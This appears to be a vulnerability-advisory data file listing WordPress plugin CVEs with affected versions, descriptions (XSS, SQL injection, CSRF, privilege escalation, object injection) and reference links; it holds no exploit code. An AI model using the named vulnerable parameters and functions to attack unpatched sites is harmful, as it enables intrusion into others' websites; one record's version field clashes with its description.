{"CVE_ID":"CVE-2023-2415","slug":"meeting-scheduler-by-vcita","versionImpact":"4.2.10","description":"The Online Booking & Scheduling Calendar for WordPress by vcita plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the vcita_logout_callback function in versions up to, and including, 4.2.10. This makes it possible for authenticated attackers with minimal permissions, such as a subscriber, to logout a vctia connected account which would cause a denial of service on the appointment scheduler.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/meeting-scheduler-by-vcita\\\/trunk\\\/vcita-ajax-function.php#L55\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/meeting-scheduler-by-vcita\\\/trunk\\\/vcita-ajax-function.php#L55\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.jonh.eu\\\/blog\\\/security-vulnerabilities-in-wordpress-plugins-by-vcita\",\"name\":\"https:\\\/\\\/blog.jonh.eu\\\/blog\\\/security-vulnerabilities-in-wordpress-plugins-by-vcita\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/731cbeed-d4aa-448f-878a-8c51a3da4e18?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/731cbeed-d4aa-448f-878a-8c51a3da4e18?source=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5538","slug":"mpoperationlogs","versionImpact":"1.0.1","description":"The MpOperationLogs plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the IP Request Headers in versions up to, and including, 1.0.1 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/bc5f1b00-acee-4dc8-acd7-2d3f3493f253?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/bc5f1b00-acee-4dc8-acd7-2d3f3493f253?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/mpoperationlogs\\\/trunk\\\/common.php#L10\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/mpoperationlogs\\\/trunk\\\/common.php#L10\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/mpoperationlogs\\\/trunk\\\/template\\\/ipslist_td.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/mpoperationlogs\\\/trunk\\\/template\\\/ipslist_td.php\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/github.com\\\/juweihuitao\\\/MpOperationLogs\\\/\",\"name\":\"https:\\\/\\\/github.com\\\/juweihuitao\\\/MpOperationLogs\\\/\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-4970","slug":"pubydoc-data-tables-and-charts","versionImpact":"2.0.6","description":"The PubyDoc WordPress plugin through 2.0.6 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Cross-Site Scripting attacks even when unfiltered_html is disallowed","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/845bbfdd-fe9f-487c-91a0-5fe10403d8a2\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/845bbfdd-fe9f-487c-91a0-5fe10403d8a2\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0658","slug":"insert-php-code-snippet","versionImpact":"1.3.4","description":"The Insert PHP Code Snippet plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the user's name when accessing the insert-php-code-snippet-manage page in all versions up to, and including, 1.3.4 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level access, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c4a6b786-d0ef-41f6-b2bf-83307ec02b91?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c4a6b786-d0ef-41f6-b2bf-83307ec02b91?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3033503%40insert-php-code-snippet&new=3033503%40insert-php-code-snippet&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3033503%40insert-php-code-snippet&new=3033503%40insert-php-code-snippet&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-7085","slug":"scalable-vector-graphics-svg","versionImpact":"3.4","description":"The Scalable Vector Graphics (SVG) WordPress plugin through 3.4 does not sanitize uploaded SVG files, which could allow users with a role as low as Author to upload a malicious SVG containing XSS payloads.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/a2ec1308-75a0-49d0-9288-33c6d9ee4328\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/a2ec1308-75a0-49d0-9288-33c6d9ee4328\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5092","slug":"elegant-addons-for-elementor","versionImpact":"1.0.8","description":"The Elegant Addons for elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's Switcher, Slider, and Iconbox widgets in all versions up to, and including, 1.0.8 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7ab3e286-05db-430e-bbe7-bfaa31134c3c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7ab3e286-05db-430e-bbe7-bfaa31134c3c?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/elegant-addons-for-elementor\\\/trunk\\\/widgets\\\/eae-switcher.php#L516\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/elegant-addons-for-elementor\\\/trunk\\\/widgets\\\/eae-switcher.php#L516\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/elegant-addons-for-elementor\\\/trunk\\\/widgets\\\/eae-slider.php#L1091\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/elegant-addons-for-elementor\\\/trunk\\\/widgets\\\/eae-slider.php#L1091\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/elegant-addons-for-elementor\\\/trunk\\\/widgets\\\/eae-iconbox.php#L1667\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/elegant-addons-for-elementor\\\/trunk\\\/widgets\\\/eae-iconbox.php#L1667\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6405","slug":"floating-social-buttons","versionImpact":"1.5","description":"The Floating Social Buttons plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.5. This is due to missing or incorrect nonce validation on the floating_social_buttons_option() function. This makes it possible for unauthenticated attackers to update the plugins settings and inject malicious web scripts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/befe5e99-204e-470e-bbbb-285b5ba0b1fb?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/befe5e99-204e-470e-bbbb-285b5ba0b1fb?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/floating-social-buttons\\\/trunk\\\/floating-social-buttons.php#L230\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/floating-social-buttons\\\/trunk\\\/floating-social-buttons.php#L230\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-4507","slug":"admission-appmanager","versionImpact":"1.0.0","description":"The Admission AppManager plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'q' parameter in versions up to, and including, 1.0.0 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/55367b9b-8ae1-4282-bf9f-8fb3848eb579?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/55367b9b-8ae1-4282-bf9f-8fb3848eb579?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/admission-appmanager\\\/trunk\\\/admin\\\/class-admission-app-manager-admin.php#L843\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/admission-appmanager\\\/trunk\\\/admin\\\/class-admission-app-manager-admin.php#L843\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9628","slug":"wps-telegram-chat","versionImpact":"4.6.0","description":"The WPS Telegram Chat plugin for WordPress is vulnerable to unauthorized modification of data and loss of data due to a missing capability check on the 'Wps_Telegram_Chat_Admin::check?onnection' function in versions up to, and including, 4.5.4. This makes it possible for authenticated attackers, with subscriber-level access and above, to have full access to the Telegram Bot API endpoint and communicate with it.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c7f7e545-5e14-421e-90b4-bc54b23d0fe6?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c7f7e545-5e14-421e-90b4-bc54b23d0fe6?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wps-telegram-chat\\\/tags\\\/4.5.4\\\/admin\\\/class-wps-telegram-chat-admin.php#L176\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wps-telegram-chat\\\/tags\\\/4.5.4\\\/admin\\\/class-wps-telegram-chat-admin.php#L176\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11092","slug":"svgplus","versionImpact":"1.1.0","description":"The SVGPlus plugin for WordPress is vulnerable to Stored Cross-Site Scripting via REST API SVG File uploads in all versions up to, and including, 1.1.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses the SVG file.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/77e43062-1a3d-4db1-aeac-4d7505d18730?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/77e43062-1a3d-4db1-aeac-4d7505d18730?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/svgplus\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/svgplus\\\/#developers\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11465","slug":"yikes-inc-easy-custom-woocommerce-product-tabs","versionImpact":"1.8.5","description":"The Custom Product Tabs for WooCommerce plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 1.8.5 via deserialization of untrusted input in the 'yikes_woo_products_tabs' post meta parameter. This makes it possible for authenticated attackers, with Shop Manager-level access and above, to inject a PHP Object. No known POP chain is present in the vulnerable software. If a POP chain is present via an additional plugin or theme installed on the target system, it could allow the attacker to delete arbitrary files, retrieve sensitive data, or execute code.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/yikes-inc-easy-custom-woocommerce-product-tabs\\\/trunk\\\/admin\\\/class.yikes-woo-generate-html.php#L19\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/yikes-inc-easy-custom-woocommerce-product-tabs\\\/trunk\\\/admin\\\/class.yikes-woo-generate-html.php#L19\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/yikes-inc-easy-custom-woocommerce-product-tabs\\\/trunk\\\/admin\\\/class.yikes-woo-saved-tabs.php#L222\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/yikes-inc-easy-custom-woocommerce-product-tabs\\\/trunk\\\/admin\\\/class.yikes-woo-saved-tabs.php#L222\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/yikes-inc-easy-custom-woocommerce-product-tabs\\\/trunk\\\/admin\\\/class.yikes-woo-saved-tabs.php#L449\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/yikes-inc-easy-custom-woocommerce-product-tabs\\\/trunk\\\/admin\\\/class.yikes-woo-saved-tabs.php#L449\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/yikes-inc-easy-custom-woocommerce-product-tabs\\\/trunk\\\/public\\\/class.yikes-woo-tabs-display.php#L47\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/yikes-inc-easy-custom-woocommerce-product-tabs\\\/trunk\\\/public\\\/class.yikes-woo-tabs-display.php#L47\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/yikes-inc-easy-custom-woocommerce-product-tabs\\\/trunk\\\/yikes-inc-easy-custom-woocommerce-product-tabs.php#L262\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/yikes-inc-easy-custom-woocommerce-product-tabs\\\/trunk\\\/yikes-inc-easy-custom-woocommerce-product-tabs.php#L262\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1ad0d6eb-aafa-4f0b-bf1c-73d94e361087?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1ad0d6eb-aafa-4f0b-bf1c-73d94e361087?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13676","slug":"categorized-gallery","versionImpact":"2.0","description":"The Categorized Gallery Plugin plugin for WordPress is vulnerable to SQL Injection via the 'field' attribute of the 'image_gallery' shortcode in all versions up to, and including, 2.0 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for authenticated attackers, with Contributor-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/categorized-gallery\\\/trunk\\\/init.php#L177\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/categorized-gallery\\\/trunk\\\/init.php#L177\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b409ef44-18fa-4ea0-90a4-69e03fa0116e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b409ef44-18fa-4ea0-90a4-69e03fa0116e?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13835","slug":"post-meta-data-manager","versionImpact":"1.4.3","description":"The Post Meta Data Manager plugin for WordPress is vulnerable to multisite privilege escalation in all versions up to, and including, 1.4.3. This is due to the plugin not properly verifying the existence of a multisite installation prior to allowing user meta to be added\/modified. This makes it possible for authenticated attackers, with Administrator-level access and above, to gain elevated privileges on subsites that would otherwise be inaccessible.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/post-meta-data-manager\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/post-meta-data-manager\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/568aa6d6-10a1-4653-ab95-845faf005b8e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/568aa6d6-10a1-4653-ab95-845faf005b8e?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-4590","slug":"daisycon","versionImpact":"4.8.4","description":"The Daisycon prijsvergelijkers plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'daisycon_uitvaart' shortcode in all versions up to, and including, 4.8.4 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/daisycon\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/daisycon\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/74551e01-063c-4493-8472-9c0903ac17c5?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/74551e01-063c-4493-8472-9c0903ac17c5?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-5953","slug":"hrm","versionImpact":"2.2.17","description":"The WP Human Resource Management plugin for WordPress is vulnerable to Privilege Escalation due to missing authorization in the ajax_insert_employee() and update_empoyee() functions in versions 2.0.0 through 2.2.17. The AJAX handler reads the client-supplied $_POST['role'] and, after basic cleaning via hrm_clean(), passes it directly to wp_insert_user() and later to $user->set_role() without verifying that the current user is allowed to assign that role. This makes it possible for authenticated attackers, with Employee-level access and above, to elevate their privileges to administrator.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/hrm\\\/tags\\\/2.2.17\\\/class\\\/employee.php#L543\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/hrm\\\/tags\\\/2.2.17\\\/class\\\/employee.php#L543\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/hrm\\\/tags\\\/2.2.17\\\/class\\\/employee.php#L591\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/hrm\\\/tags\\\/2.2.17\\\/class\\\/employee.php#L591\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/hrm\\\/tags\\\/2.2.17\\\/class\\\/employee.php#L89\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/hrm\\\/tags\\\/2.2.17\\\/class\\\/employee.php#L89\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/hrm\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/hrm\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3ba33a18-429f-4a3e-b018-bdfbbe6e8482?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3ba33a18-429f-4a3e-b018-bdfbbe6e8482?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-8212","slug":"medical-addon-for-elementor","versionImpact":"1.6.3","description":"The Medical Addon for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's Typewriter widget in all versions up to, and including, 1.6.3 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/medical-addon-for-elementor\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/medical-addon-for-elementor\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9dc5452d-41e4-4b28-bb89-fe5ef9c10cb7?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9dc5452d-41e4-4b28-bb89-fe5ef9c10cb7?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-4808","slug":"wp-post-modal","versionImpact":"3.7.3","description":"The WP Post Popup WordPress plugin through 3.7.3 does not sanitise and escape some of its inputs, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/bb8e9f06-477b-4da3-b5a6-4f06084ecd57\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/bb8e9f06-477b-4da3-b5a6-4f06084ecd57\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0656","slug":"password-protected","versionImpact":"2.6.6","description":"The Password Protected \u2013 Ultimate Plugin to Password Protect Your WordPress Content with Ease plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Google Captcha Site Key in all versions up to, and including, 2.6.6 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level access, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/aba36c3b-beae-4c47-8aa8-5012a7a838ce?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/aba36c3b-beae-4c47-8aa8-5012a7a838ce?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3034934%40password-protected&new=3034934%40password-protected&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3034934%40password-protected&new=3034934%40password-protected&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4971","slug":"learnpress","versionImpact":"4.2.6.6","description":"The LearnPress \u2013 WordPress LMS Plugin plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the \u2018id\u2019 parameter in all versions up to, and including, 4.2.6.6 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/10b08a05-3561-4d05-985b-6a2339a547a7?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/10b08a05-3561-4d05-985b-6a2339a547a7?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/learnpress\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/learnpress\\\/#developers\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11085","slug":"wp-log-viewer","versionImpact":"1.2.1","description":"The WP Log Viewer plugin for WordPress is vulnerable to unauthorized use of functionality due to a missing capability check on several AJAX actions in all versions up to, and including, 1.2.1. This makes it possible for authenticated attackers, with Subscriber-level access and above, to access logs, update plugin-related user settings and general plugin settings.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e27bd526-1a5f-4628-8bb2-1741496f897f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e27bd526-1a5f-4628-8bb2-1741496f897f?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-log-viewer\\\/trunk\\\/libs\\\/Ajax.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-log-viewer\\\/trunk\\\/libs\\\/Ajax.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12062","slug":"charity-addon-for-elementor","versionImpact":"1.3.3","description":"The Charity Addon for Elementor plugin for WordPress is vulnerable to Information Exposure in all versions up to, and including, 1.3.2 via the 'nacharity_elementor_template' shortcode due to insufficient restrictions on which posts can be included. This makes it possible for authenticated attackers, with Contributor-level access and above, to extract data from private or draft posts created by Elementor that they should not have access to.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/charity-addon-for-elementor\\\/trunk\\\/elementor\\\/lib\\\/lib.php#L12\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/charity-addon-for-elementor\\\/trunk\\\/elementor\\\/lib\\\/lib.php#L12\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7ac68314-c704-4273-addc-4bc623659769?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7ac68314-c704-4273-addc-4bc623659769?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11755","slug":"ims-countdown","versionImpact":"1.3.4","description":"The IMS Countdown plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Countdown post settings in all versions up to, and including, 1.3.4 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ims-countdown\\\/trunk\\\/shortcode\\\/shortcode.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ims-countdown\\\/trunk\\\/shortcode\\\/shortcode.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2de22728-4f67-406c-9db5-33cbba4c15eb?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2de22728-4f67-406c-9db5-33cbba4c15eb?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
